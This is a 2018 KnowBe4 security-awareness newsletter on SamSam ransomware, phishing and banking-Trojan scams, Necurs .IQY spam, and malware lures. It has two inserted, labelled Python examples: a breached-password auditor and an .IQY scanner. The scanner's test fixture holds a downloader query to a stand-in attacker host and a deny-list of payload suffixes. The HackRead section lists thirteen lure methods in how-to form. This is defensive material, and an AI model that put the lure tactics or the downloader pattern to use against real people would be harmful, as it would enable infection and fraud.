CyberheistNews Vol 8 #26 [Heads-up] New Sleeper Strain of SamSam Ransomware Bypasses AV And Stays Hidden On Your Network


The ransomware strain that crippled several cities and school districts in the U.S. earlier this year is back with more tricks up its sleeve to avoid detection.

If you haven’t heard of SamSam, you haven’t been paying attention. Just one example of the kind of destruction they can cause is the recent attack on the Colorado Department of Transportation which caused downtime for 2,000+ systems.

This new SamSam strain adds a human element to its already devious mix of evasive techniques to keep antivirus, endpoint, and even more advanced security software from detecting it.

SamSam avoids discovery through sophisticated methods of constructing and executing its payload. In a recent blog, endpoint protection company Malwarebytes provides a detailed technical explanation of how this new variant of SamSam works.

Your Executive Summary

Your executive summary: this SamSam strain avoids detection using three advanced techniques:
  • It decrypts the payload only at run-time, making it nearly impossible to identify and analyze.
  • The loader, payload, and logs are wiped, leaving very few traces behind for any forensics or scanning tools.
  • It requires a password to be entered by the threat actor before it will run at all.

It’s that last part of the attack that makes this latest strain so dangerous. Unlike most ransomware strains, which are designed to spread automatically, this new strain of SamSam is designed for targeted attacks.

By requiring a password, the payload stays encrypted (and therefore secret) until the bad guys choose to wake it up in your network, everywhere at the same moment, to create the biggest impact and damage.

Do You Want The Good News Or The Bad News?

The good news is that, should users accidentally download this strain of ransomware, or should your network be compromised via an RDP brute-force attack, the payload is harmless without the password to run it. The bad news is that, should the SamSam gang decide your organization is next up to be extorted, all your users will be sitting on their hands for possibly weeks if your backups fail. Continued at the KnowBe4 blog:

[BREAKING NEWS] Employees Sue Company For W-2 Phishing Scam. Federal Court Decides Triple Damages

Imagine my surprise when I saw a picture of myself in the blog of the large North Carolina law firm Poyner Spruill. It was all good though.

They had picked up an example of a real W-2 phishing scam we received that I had posted on our own blog. The screenshot was a good illustration of the risks of W-2 CEO Fraud.

However, the article literally raised my eyebrows. Why?

Read this and then send this post to your CEO and your legal team right away.

According to a recent federal court decision, an employee who is tricked into sharing personal information in response to a phishing email can be seen as committing an intentional disclosure under the North Carolina Identity Theft Protection Act (NCITPA). As a result, the employer could face treble damages for the employee’s mistake, adding a new element to potential exposure for businesses.

Employees who fall for CEO Fraud commit an "intentional disclosure".

Poyner Spruill's J.M. Durnovich was right to highlight this development, which was also picked up by the nationwide Law360 site.

The failure to train employees may quickly become more costly, and not only for North Carolina employers. This decision will be looked at by other courts, which may very well come to the same conclusion: that not taking reasonable measures to defend against scams like this merits treble (punitive) damages.

Here is a short extract from the Poyner Spruill post which I strongly recommend you read in full. Continued at KnowBe4 blog:

[ALERT] There Is A New Hybrid Cyber Attack On Banks And Credit Unions In The Wild

A customer just called me. He found a new strain of attack that's the next scary thing your organization may become the target of.

He's been using our platform for 6 years, first at a bank where he selected our platform and deployed it, and in his second job, they already used KnowBe4 to create their human firewall so he got off to a running start.

The issue he warned me about today is the following. There is a new hybrid attack that starts with a Banking Trojan which gets on the machine by using social engineering to get in, suspected to be email.

Once the Trojan kicks in, it looks in real time for the word "bank" in the browser and if it sees the end user go to their bank, they redirect the user to a malicious site that looks like that bank and steals their credentials. Up to now this is nothing new.

However, here is the wrinkle...

The Trojan starts to slow down the browser, and simulates "technical problems" with the site for a few minutes. Then it comes up with another popup which asks for their name and phone number so that "support can call them back".

Next, the end-user gets a phone call from a live bad guy, claiming to be the support team of the bank, who then starts to social engineer the customer real-time and tries to manipulate the end user into divulging more detail so that the bad guy can make an immediate transfer out of the account.

This is the first time we have heard of this nasty variant on the tech support scam, but it now looks like it's tailor-made for a certain bank. You can count on this tactic being used soon for credit unions as well. Not good. Be warned!

Do employees open your network to the bad guys by using hacked passwords?

A whopping 25% of employees use the same password for all logins. What if that password is available on the dark web? A massive number of passwords are compromised in data breaches and used by the bad guys for attacks. Are any hacked passwords in use within your organization?

Using breached passwords puts your network at risk. Password policies often do not prevent employees from using known bad passwords. Making your users change their passwords frequently isn’t a good solution either. It only takes one compromised password match for the bad guys to gain access.

KnowBe4’s complimentary NEW Breached Password Test (BPT) checks to see if your users are currently using passwords that are in publicly available breaches associated with your domain. BPT checks against your Active Directory and reports compromised passwords in use right now so that you can take action immediately!

Here’s how Breached Password Test works:
  • Checks to see if your company domains have been part of a data breach that included passwords
  • Checks to see if any of those breached passwords are currently in use in your Active Directory
  • Does not show/report on the actual passwords of accounts
  • Just download the install and run it
  • Results in a few minutes!
Find out now which users are using hacked passwords!

Don't Underestimate The Economic Side of Russia's Cyber Warfare
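An added example, not KnowBe4's BPT code: the core of a breached-password check as the section describes it, written so the plaintext is never handled or reported. It uses the k-anonymity range lookup popularised by Have I Been Pwned (only the first 5 hex characters of a hash are sent; suffixes are compared locally) and also reports accounts sharing one password. The breach corpus, the directory hashes and the account names are constructed for the example, and SHA-1 stands in for the NT hashes a real Active Directory check would compare against an NTLM range source.

```python
"""Added example (not KnowBe4's tool): breached-password audit via range lookup.

The checker never reports a plaintext password: it works on hashes, sends only a
5-character hash prefix to the (simulated) breach range endpoint, and compares
the returned suffixes locally.  Corpus, directory and account names are
constructed; a real AD check would use NT hashes and an NTLM range source.
"""
import hashlib
from collections import defaultdict
from typing import Dict, List


def sha1_hex(password: str) -> str:
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


# Constructed breach corpus: plaintext -> times seen in dumps (only the hashes
# are retained below, as a real range service would hold them).
BREACHED_PASSWORDS = {"Password1": 412, "Summer2018!": 37, "letmein": 1200}
_CORPUS = {sha1_hex(p): n for p, n in BREACHED_PASSWORDS.items()}


def range_lookup(prefix5: str) -> Dict[str, int]:
    """Simulated range endpoint: every corpus hash sharing the 5-char prefix.

    Returns {suffix35: count}.  The caller never sends more than the prefix,
    so the service cannot learn which full hash was being checked.
    """
    return {h[5:]: n for h, n in _CORPUS.items() if h.startswith(prefix5)}


def is_breached(password_hash: str) -> int:
    """Breach count for a hash (0 if unseen), found via a range query."""
    h = password_hash.upper()
    return range_lookup(h[:5]).get(h[5:], 0)


def audit_directory(hashes_by_account: Dict[str, str]) -> dict:
    """Report accounts using breached passwords and groups of accounts that
    share one password (reuse).  Only account names are reported, never the
    passwords themselves."""
    breached: Dict[str, int] = {}
    by_hash: Dict[str, List[str]] = defaultdict(list)
    for account, h in hashes_by_account.items():
        by_hash[h.upper()].append(account)
        count = is_breached(h)
        if count:
            breached[account] = count
    reused = [accts for accts in by_hash.values() if len(accts) > 1]
    return {"breached": breached, "shared_password_groups": reused}


# Constructed "directory": account -> password hash (no plaintext is kept).
DIRECTORY = {
    "alice": sha1_hex("Password1"),
    "bob": sha1_hex("correct horse battery staple"),
    "carol": sha1_hex("Summer2018!"),
    "dave": sha1_hex("Password1"),
}

if __name__ == "__main__":
    report = audit_directory(DIRECTORY)
    for account, count in report["breached"].items():
        print(f"{account}: password seen {count} times in breach data")
    for group in report["shared_password_groups"]:
        print("same password shared by:", ", ".join(sorted(group)))
```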

I just ran into an excellent article by Boris Zilberman, deputy director of congressional relations and a Russia analyst at the Foundation for Defense of Democracies. It was posted at The Cipher Brief, which is a digital, security-based conversation platform that connects the private sector with the world's leading security experts. You should check it out, warmly recommended.

Zilberman is making some very important points that reinforce what I have been saying here about Russia and Vladimir Putin. At the end of this post is a link to a 24-page PDF that contains the detail and meticulous documentation.

This is your executive summary:

Cyber-enabled economic warfare is hardwired into the Russian legal system. It's no accident that Russian law establishes the Federal Security Service (FSB), the successor to the KGB, as the licensing authority for encryption activities.

By design, the laws and regulations governing information systems, telecommunications, and encryption give the Kremlin and its security services tools to consolidate power internally and engage in aggressive activities abroad.

The FSB can even require private companies to provide direct assistance to its online endeavors at home and abroad. Perhaps with this in mind, the European Union recently called on its members to ban malicious technology and telecommunications equipment and software including products from Kaspersky Lab.

Full story and links here:

NEW Whitepaper: The 2018 Phishing By Industry Benchmarking Report

As a security leader, you’re faced with a tough choice.

Even as you increase your budget for sophisticated security software, your exposure to cybercrime keeps going up!

IT security seems to be a race between effective technology and clever attack methods. However, there’s an often-overlooked security layer that can significantly reduce your organization’s attack surface: New-school security awareness training.

In this report, brand-new research from KnowBe4 highlights employee Phish-prone™ percentages by industry, revealing at-risk users who are susceptible to phishing or social engineering attacks.

Taking it a step further, the research also reveals radical drops in careless clicking after 90 days and 12 months of new-school security awareness training.

Do you know how your organization compares to your peers of similar size?

Download this whitepaper to find out!

Exclusive Interview with Kevin Mitnick Ask Me Anything [VIDEO]

KnowBe4's Chief Hacking Officer Kevin Mitnick sat down with our team for an exclusive interview where we could ask him anything… We thought you’d like to hear his answers, too. Ever wonder what he thinks about pen testing, how he got into the business, why he works with KnowBe4? Find out now, 7 minutes well spent! See it here, great for a short break:

Let's stay safe out there.

Warm Regards,
Stu Sjouwerman
Founder and CEO
KnowBe4, Inc

Quotes of the Week
"The Constitution only gives people the right to pursue happiness. You have to catch it yourself."
- Benjamin Franklin, Statesman (1706 - 1790)

"Exactitude in some small matters is the very soul of discipline."
- Joseph Conrad, Writer (1857 - 1924)

Thanks for reading CyberheistNews
Security News
The World's-Largest Necurs Botnet Gets Creative

Barkly researchers have identified the third wave of an attack that began in late May. The Necurs Botnet is driving a new spam campaign using Excel Web Query (.IQY) attachments.

These tend to arrive undetected. The attack has the potential to deliver FlawedAmmyy, a remote access trojan (RAT). .IQY files are not inspected by AV engines the way full Excel spreadsheets are.

Since they are relatively small, simple text files with little history of being weaponized, .IQY files are not usually indexed by traditional anti-virus software. Their ability to act as downloaders, which once launched in Excel are activated and download malicious content, makes them extremely dangerous.
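An added example, not from the newsletter or from Barkly: a small Python check a mail gateway could run on .IQY attachments. It parses the web-query layout (a WEB marker line, a version line, then the URL) and flags files that would make Excel fetch content from a host outside an allow-list; the `ALLOWED_HOSTS` set, the hosts and the two sample files are assumptions constructed for the example.

```python
"""Added example (not the newsletter's code): gateway check for .IQY attachments.

An Excel Web Query file is a tiny text file meaning "open Excel and fetch this
URL".  This scanner parses that layout and flags files whose target is outside
a constructed allow-list, so a defender can quarantine them instead of relying
on AV engines, which the article notes tend not to inspect them.
"""
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlparse

# Hypothetical hosts that legitimately serve web queries to Excel in this org.
ALLOWED_HOSTS = {"intranet.example.internal", "reports.example.internal"}

# Targets that should never be pulled into Excel even from an allowed host.
PAYLOAD_SUFFIXES = (".exe", ".dat", ".vbs", ".ps1", ".js", ".hta")


@dataclass
class IqyFinding:
    url: str
    reason: str


def parse_iqy(text: str) -> Optional[str]:
    """Return the query URL from .IQY text, or None if it is not a web query.

    Layout: line 1 = "WEB", line 2 = format version ("1"), line 3 = the URL;
    any further lines are optional key=value settings such as Selection=.
    """
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        return None
    return lines[2]


def classify_iqy(text: str) -> Optional[IqyFinding]:
    """Flag an .IQY attachment whose target Excel should not be allowed to reach."""
    url = parse_iqy(text)
    if url is None:
        return None
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if parsed.scheme not in ("http", "https"):
        return IqyFinding(url, f"unexpected scheme {parsed.scheme!r}")
    if host not in ALLOWED_HOSTS:
        return IqyFinding(url, f"remote query to non-allow-listed host {host!r}")
    if parsed.path.lower().endswith(PAYLOAD_SUFFIXES):
        return IqyFinding(url, "query target looks like an executable payload")
    return None


# Constructed samples: one benign internal report, one lure-style downloader.
BENIGN_IQY = "WEB\n1\nhttps://reports.example.internal/q1.html\n\nSelection=AllTables\n"
LURE_IQY = "WEB\n1\nhttp://attacker.invalid/invoice/1.dat\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_IQY), ("lure", LURE_IQY)):
        finding = classify_iqy(sample)
        verdict = "OK" if finding is None else f"QUARANTINE: {finding.reason}"
        print(f"{name}: {verdict}")
```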

FlawedAmmyy is built from source code of legitimate desktop software Ammyy Admin. The malware has been in use since early 2016. FlawedAmmyy performs the same functions as the legitimate version, but it also allows data theft and conscription of victim machines into spam campaigns.

Two campaigns have been credited with using FlawedAmmyy: a targeted email attack focused on the automotive industry, and a multi-million message campaign active for the past four years and associated with threat actor TA505.

Accounting for close to 90% of daily spam, Necurs has been called the "Scarface of spam." Cisco's Talos unit identifies it as the world’s largest spambot. Necurs traffic between August and November topped 2.1 million spam messages originating from 1.2 million unique IP addresses in over 200 countries.

The use of .IQY files by criminals will probably continue, so having a proactive plan to protect your data is highly recommended. The first line of protection, of course, is a culture of security, built and sustained by regular, realistic interactive training to recognize phishing attempts. ThreatPost has the story:

It Saves Your Battery, but Its Social Engineering Steals Your Data

Google Play is a walled garden, but the serpents do find their way in. RiskIQ has found one snake with a tempting offer on its forked tongue: an app that "saves the battery" in your mobile device.

It begins with a vaguely plausible pop-up: "Samsung clean-up might be required! Your Samsung SM-G925A might be slowed down and your battery may discharges quickly. Please clean your Samsung memory to solve this problem and increase phone speed. Install recommended app to clean your Samsung immediately!"

Connoisseurs of social engineering will recognize the weak grammar in the second sentence of the come-on. They will also recognize the immediacy of the invitation. Calling the app "recommended" is a nice touch, and the fact there is no cost can be hard to resist.

If you do click "Install," you'll be taken to Google Play, and there you'll find the app as advertised. If you look at the permissions it requests, you'll say "no." Those permissions include the following, and there are many others:
  • "Read sensitive log data"
  • "Receive text messages (SMS)"
  • "Receive data from Internet"
  • "Pair with Bluetooth devices"
  • "Full network access"
  • "Modify system settings"

All of these should put the user on guard. The app also installs an ad-clicker backdoor that harvests additional information. It's interesting to note that in addition to all of this badness, the app actually does do the things it promised up front. It reduces battery strain, it kills battery-use-intensive processes when charge is low, and it monitors battery status. None of this, of course, is worth it.

There are several lessons here that any organization might want to share with its employees. First, don't assume that all the apps in the Play store are legit. Google Play is working hard to clean out the snakes, but they still find their way in, similar to Apple's store.

The developer transparency of the Play store can help you recognize repeat offenders. Second, look for linguistic clues that you're being scammed. Many criminal organizations are international, and they often stumble over the harder parts of their language.

See the second sentence of the pop-up for an example: "your battery may discharges quickly." Third, beware of attempts to rush you. "Immediately" and "now" should put you on your guard. And finally, read the permissions an app wants before you install it.

All of these lessons can be reinforced with new-school security awareness training. See RiskIQ's blog for the story of this particular social engineering scam:

Different Criminals, Different Techniques, but Common Weaknesses

HackRead has identified thirteen distinct ways criminals spread malware. They all involve some form of social engineering. It's interesting to see the variations criminal ingenuity throws up, and worth thinking of these approaches when you conduct awareness training for your organization's employees.
    1. Setting up micro job websites, crowdsourcing platforms where people pick up small jobs for small amounts of money, can draw in the marks. They're especially convincing and effective when they're accompanied by a password-protected archive in Dropbox or Google Drive.

    2. Or social network spam might work: game cheats are particularly popular.

    3. Establish a bogus Facebook profile to attract likes. Offer a cheap or even free program as a make-money-at-home scheme. Eventually you'll have people installing the malware you set up there.

    4. YouTube spam is effective at getting people to install code better left alone.

    5. Watering holes are common modes of infection. It's easy to set up a WordPress site, and commodity, turnkey malicious script is readily available on the black market.

    6. Anonymous chat rooms can be baited with adult content.

    7. Spamming themed chat rooms on Telegram. The chat room of course should be booby-trapped.

    8. Hawk a plausible but off-the-beaten track money-making scheme.

    9. Post a malicious browser game. These are especially popular with children.

    10. Use a dating site to build trust to a point where the scammer and the mark are exchanging photos. The scammer's photos, of course, are malicious.

    11. Contact partners of romance scam victims and tell them you're having an affair with their significant other. Offer photos as proof. These photos too are baited with malware.

    12. Attract marks on a dark web forum by offering a malicious document that purports to contain, and may in fact contain, a money-making scheme. The document will also, of course, contain malware.

    13. Copy the software section from a cryptomining forum, machine-translate it into another language, post it in an appropriate mining forum, and add a link that purports to go to the software. The link should go to an information stealer.

These are thirteen methods, but they all represent variations on five traditional human weaknesses: greed, lust, jealousy, sloth, and boredom. Interactive training to resist social engineering can almost be a kind of imagination of conscience. HackRead had the story:

Even Law Firms Suffer From Social Engineering

They may not fall for an advance fee scam from an emailer claiming to be the widow of a Nigerian prince, but law firms have their issues with social engineering, too.

An early case hit a Connecticut personal injury law firm in 2008. They received an email, apparently from an attorney in North Carolina who said she was attempting to settle a debt a Chinese company owed a company based in Connecticut.

It appeared to be a straightforward collection issue. The director of the Chinese company signed a retainer agreement with the Connecticut law firm, sent them a $200,000 check drawn on Wachovia Bank, and subsequently instructed the law firm to wire payment to a South Korean bank, which they did.

The problem was this: the North Carolina attorney, the Chinese metallurgical firm, and the Connecticut company were all real, but none of them knew anything about the matter. They had, in fact, been impersonated, and the $200,000 check was bogus. The Connecticut law firm was out the money.

The social engineering attack was complex, convincing, and played out over a couple of weeks.

That was unusual ten years ago. Unfortunately today it's more common. Social engineers going after bigger phish do their homework and tailor their messaging for plausibility.

You might think that people as accustomed to dealing with the crooked timber of humanity as attorneys would be forearmed against most forms of fraud. But social engineering can be surprisingly persuasive.

Law firms and other professional companies with similar responsibilities—one thinks of accounting firms—would benefit from a review of their policies.

They would also benefit from realistic, interactive security awareness training for their partners, associates, and staff tailored to the kinds of scams they're too likely to encounter. The ABA Journal has the story:

What Is the Difference Between a Hack and a Breach?

The terms data breach and hack are often used interchangeably, but there are some differences: a breach is when data is unintentionally left unsecured and vulnerable to hacking, as a result of malicious activity or from negligence.

A hack specifically refers to the activities of cyber attackers who purposely compromise IT infrastructure to steal information or to hold systems ransom. If your data was part of a breach, it’s possible it was just left exposed online and was not stolen. Likewise, not all hacks result in breaches.

What KnowBe4 Customers Say

"Thanks Stu. Everything is working well. We switched over from Wombat and our end users are definitely having an easier, more intuitive experience when using the training modules. Julia Smith was our sales manager, she did an excellent job answering all of our questions and went above and beyond during the process." - S.S., IT Network Admin

"Hello Stu, So far we’ve been very happy with your service. We are still in the early stages, but it’s filled an important gap and taken a lot of work off of my shoulders as IT manager.

The training videos are going over well and the phishing tests have successfully started making employees more aware of being security conscious, both at work and at home.

I also appreciate the newsletter/blogs you’ve been sending. Short and to the point, with links to further details if wanted. Overall, we’re quite happy with your service and feel like it’s money well-spent. Regards," - C.S., Information Systems Manager

"Hi Stu. Thanks for the follow up. Your product to date has been great. Much better than our previous solution provided by Phishline. Keep adding new features and content! Thanks." - H.C., Director Of IT Security

The 10 Interesting News Items This Week
    1. Hackers who sabotaged the Olympic games return for more mischief:

    2. Faked Video Will Complicate Justice by Twitter Mob:

    3. Free Societies are at a Disadvantage in National Cybersecurity:

    4. Email Phishers Using a Simple Way to Bypass MS Office 365 Protection:

    5. Hackers Hit Satellite Operators and Telecoms, Symantec Says:

    6. Cybersecurity Disclosures Should Be Beefed Up, Speeded up Says SEC Commissioner:

    7. Oregon.Gov Email Domain Remains Blacklisted:

    8. FBI Publishes its 2017 Internet Crime Report. Here are the highlights:

    9. US-CERT Uncovers North Korean Typeframe Malware:

    10. Meet MyloBot - A New Highly Sophisticated Never-Seen-Before Botnet That's Out in the Wild:
Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff
Copyright © 2014-2018 KnowBe4, Inc. All rights reserved.